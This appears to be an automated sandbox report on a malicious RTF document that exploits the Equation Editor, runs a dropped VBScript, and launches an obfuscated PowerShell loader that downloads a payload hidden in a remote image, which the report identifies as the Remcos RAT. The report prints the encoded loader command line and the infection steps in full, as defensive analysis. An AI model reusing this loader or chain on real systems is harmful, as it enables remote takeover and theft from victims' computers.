?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,9_2_004167EF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00254D608_2_00254D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043706A9_2_0043706A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004140059_2_00414005
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E11C9_2_0043E11C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004541D99_2_004541D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004381E89_2_004381E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041F18B9_2_0041F18B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004462709_2_00446270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E34B9_2_0043E34B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004533AB9_2_004533AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042742E9_2_0042742E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004375669_2_00437566
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E5A89_2_0043E5A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004387F09_2_004387F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043797E9_2_0043797E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004339D79_2_004339D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044DA499_2_0044DA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00427AD79_2_00427AD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041DBF39_2_0041DBF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00427C409_2_00427C40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00437DB39_2_00437DB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00435EEB9_2_00435EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043DEED9_2_0043DEED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00426E9F9_2_00426E9F
                Source: ~WRF{0230E32B-C301-4FA6-B113-F550CB612E0B}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                Source: xnHel.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3536, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPEDMatched rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 author = ditekSHen, description = detects CVE-2017-8759 weaponized RTF documents.
                Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winRTF@10/21@2/4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,9_2_0041798D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,9_2_0040F4AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,9_2_0041B539
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AADB
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$xnHel.rtfJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-O0U3JA
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA2D3.tmpJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P.....................D........2.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P.....................D........2.........................s............................................Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: xnHel.rtfReversingLabs: Detection: 47%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? 